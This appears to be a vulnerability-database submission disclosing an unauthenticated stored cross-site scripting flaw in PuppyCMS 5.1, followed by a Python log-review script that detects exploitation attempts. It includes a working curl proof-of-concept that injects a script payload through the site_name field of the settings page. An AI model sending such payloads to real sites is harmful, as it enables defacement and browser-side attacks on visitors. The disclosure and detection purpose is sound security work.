Submit #48008: PuppyCMS >= 5.1 - Cross-site Scripting Stored

Title: PuppyCMS >= 5.1 - Cross-site Scripting Stored
Description:
# Exploit Title: PuppyCMS >= 5.1 - Cross-site Scripting Stored
# Date: 2022-10-11
# Exploit Author: Mr Empy
# Vendor Homepage: https://github.com/choregus
# Software Link: https://github.com/choregus/puppyCMS
# Version: >= 5.1
# Tested on: Linux

Title:
================
PuppyCMS >= 5.1 - Cross-site Scripting Stored

Summary:
================
PuppyCMS versions below or equal to 5.1 are vulnerable to a Cross-site Scripting Stored exploit, which allows the injection of arbitrary Javascript code through the site_name parameter without authentication. Exploitation can be used to manipulate the capabilities of victims' browsers.

Severity Level:
================
5.8 (Medium)
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:L/A:N

Affected Product:
================
PuppyCMS >= v5.1

Steps to Reproduce:
================
1. Open your terminal and run this command:

TARGET="http://x.x.x.x/puppyCMS";XSS_PAYLOAD='<script>alert("PuppyCMS XSS")</script>';curl "$TARGET/admin/settings.php" -X POST -d "site_name=$XSS_PAYLOAD&site_root=/&password=&password-repeat=&site_template=top-nav-red&from_email=your%40email.com&submit=Submit"
Source: https://github.com/choregus/puppyCMS
User: mrempy (UID 24379)
Submission: 12/10/2022 03:24 AM (4 years ago)
Moderation: 12/10/2022 11:25 AM (8 hours later)
Status: Accepted
VulDB Entry: 210699 [puppyCMS up to 5.1 /admin/settings.php site_name cross site scripting]
Points: 20
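
A defender-side check for the issue recorded above, as an added example that is not part of the submission or of puppyCMS: it reviews request logs for POSTs to /admin/settings.php that arrive without a session or carry markup in site_name. The JSON log layout, its field names (src, has_session, body) and the sample records are constructed assumptions.

```python
import html
import json
import re
from urllib.parse import parse_qs, unquote_plus

# An opening or closing tag; a site name has no reason to contain one.
TAG = re.compile(r"<\s*/?\s*[a-zA-Z!]")

# Constructed sample records. The JSON layout and field names are assumptions
# standing in for whatever your proxy or WAF audit log actually writes.
SAMPLE_LOG = [
    '{"src":"198.51.100.7","method":"POST","path":"/puppyCMS/admin/settings.php",'
    '"has_session":false,"body":"site_name=%3Cscript%3Ealert(%22PuppyCMS+XSS%22)'
    '%3C%2Fscript%3E&site_root=/&submit=Submit"}',
    '{"src":"203.0.113.5","method":"POST","path":"/puppyCMS/admin/settings.php",'
    '"has_session":true,"body":"site_name=My+Puppy+Site&site_root=/&submit=Submit"}',
    '{"src":"203.0.113.20","method":"POST","path":"/puppyCMS/admin/settings.php",'
    '"has_session":true,"body":"site_name=%253Cb%253EShop%253C%252Fb%253E&submit=Submit"}',
    '{"src":"203.0.113.9","method":"GET","path":"/puppyCMS/admin/settings.php",'
    '"has_session":false,"body":""}',
]

def fully_decode(value, rounds=3):
    """Undo nested URL and HTML-entity encoding so hidden markup is visible."""
    for _ in range(rounds):
        decoded = html.unescape(unquote_plus(value))
        if decoded == value:
            break
        value = decoded
    return value

def review(lines):
    """Return (source, reasons) for each suspicious settings change."""
    findings = []
    for line in lines:
        rec = json.loads(line)
        if rec["method"] != "POST" or not rec["path"].endswith("/admin/settings.php"):
            continue
        reasons = []
        if not rec.get("has_session"):
            reasons.append("unauthenticated settings change")
        form = parse_qs(rec.get("body", ""), keep_blank_values=True)
        if any(TAG.search(fully_decode(v)) for v in form.get("site_name", [])):
            reasons.append("markup in site_name")
        if reasons:
            findings.append((rec["src"], reasons))
    return findings

if __name__ == "__main__":
    for src, reasons in review(SAMPLE_LOG):
        print(src, "; ".join(reasons))
```

Log review of this kind is a stopgap; the durable fix is in the application, which should require authentication on the settings page and HTML-encode site_name wherever it is rendered.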
